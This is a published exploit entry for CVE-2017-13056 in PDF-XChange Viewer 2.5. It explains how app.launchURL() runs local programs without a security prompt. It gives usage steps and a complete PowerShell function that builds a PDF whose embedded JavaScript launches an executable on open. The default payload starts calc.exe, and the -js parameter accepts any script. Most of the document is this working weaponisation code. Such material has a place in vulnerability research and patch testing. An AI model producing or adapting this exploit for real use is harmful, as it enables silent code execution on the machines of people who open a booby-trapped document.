
# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
|
|
# Date: 21-08-2017
|
|
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
|
|
# Exploit Author: Daniele Votta
|
|
# Contact: vottadaniele@gmail.com
|
|
# Website: https://www.linkedin.com/in/vottadaniele/
|
|
# CVE: CVE-2017-13056
|
|
|
|
# Category: PDF Reader RCE
|
|
|
|
1. Description
|
|
|
|
This script abuses the app.launchURL() JavaScript API as implemented in PDF-XChange Viewer
2.5 (build 314.0). When launchURL() is given a local file-system path instead of a web URL,
the viewer hands that path to the shell and executes it without showing the security dialog
that normally guards launch actions. Any user who opens a crafted PDF therefore runs the
attacker-chosen program under their own account; no further interaction is needed.
|
|
|
|
2. Proof of Concept (generate a malicious PDF that starts calc.exe on open)
|
|
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
|
|
Step 2: In Windows PowerShell, dot-source the script so the function is defined, then call it: PS C:\Users\User> . .\New-PDFjs.ps1; New-PDFJS   (use -js / -filename to override the defaults)
|
|
Step 3: Open the generated PDF with the vulnerable PDF-XChange Viewer 2.5 (build 314.0) — on an isolated test machine — and calc.exe starts without a launch prompt. (The "Nitro Pro" reference here was a copy-paste error; this PoC targets PDF-XChange Viewer.)
|
|
|
|
3. PDF Generation:
|
|
|
|
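function New-PDFJS {
    <#
    .SYNOPSIS
        Builds a one-page PDF that carries document-level JavaScript (PoC for CVE-2017-13056).

    .DESCRIPTION
        Uses the PdfSharp library to create a PDF whose catalog /Names dictionary holds a
        /JavaScript name tree with a single entry. Readers that honour document-level
        JavaScript execute it when the file is opened. The default payload calls
        app.launchURL() on a local executable, which affected PDF-XChange Viewer builds
        run without the usual security prompt.

    .PARAMETER js
        JavaScript source embedded in the document. The default launches calc.exe.

    .PARAMETER msg
        Text drawn on the page and used as the document title.

    .PARAMETER filename
        Output path of the generated PDF.

    .PARAMETER PdfSharpPath
        Path to PdfSharp-WPF.dll. Previously hard-coded to the author's desktop; the
        default is kept for compatibility, but you will almost certainly need to pass it.

    .OUTPUTS
        None. The PDF is written to $filename.

    .NOTES
        Only for testing on systems you are authorised to assess. The generated file
        will be flagged by most AV/EDR products once the payload is non-trivial.
    #>
    [CmdletBinding()]
    Param (
        [string]$js = "app.launchURL('C:\\Windows\\System32\\calc.exe')",
        [string]$msg = "Hello PDF",
        [string]$filename = "C:\Users\User\Desktop\calc.pdf",
        [string]$PdfSharpPath = "C:\Users\Daniele\Desktop\PdfSharp-WPF.dll"
    )

    # Fail early with a clear message instead of an opaque Add-Type error.
    if (-not (Test-Path -LiteralPath $PdfSharpPath -PathType Leaf)) {
        throw "PdfSharp-WPF.dll not found at '$PdfSharpPath'; pass -PdfSharpPath <path>."
    }
    Add-Type -Path $PdfSharpPath

    # Minimal document with a single page so the file renders as an ordinary PDF.
    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.Info.Creator = "AnonymousUser"
    $page = $doc.AddPage()

    # Draw the decoy text centred in a band across the top of the page.
    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box = New-Object PdfSharp.Drawing.XRect(0, 0, $page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)

    # JavaScript action dictionary: << /S /JavaScript /JS (payload) >>
    $jsAction = New-Object PdfSharp.Pdf.PdfDictionary
    $jsAction.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $jsAction.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js)
    $doc.Internals.AddObject($jsAction)

    # Name tree leaf: << /Names [ (EmbeddedJS) <ref to action> ] >>
    # The name string is arbitrary; the reference is what the reader executes.
    $nameTree = New-Object PdfSharp.Pdf.PdfDictionary
    $nameArray = New-Object PdfSharp.Pdf.PdfArray
    $entryName = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
    $nameTree.Elements["/Names"] = $nameArray
    $nameArray.Elements.Add($entryName)
    $nameArray.Elements.Add($jsAction.Reference)
    $doc.Internals.AddObject($nameTree)

    # Hook the tree into the catalog: /Names << /JavaScript <ref to name tree> >>
    # This is the document-level JavaScript slot, so no /OpenAction is required.
    $namesDict = New-Object PdfSharp.Pdf.PdfDictionary
    $namesDict.Elements["/JavaScript"] = $nameTree.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $namesDict

    $doc.Save($filename)
    Write-Verbose "Wrote $filename"
}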
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42537.zip |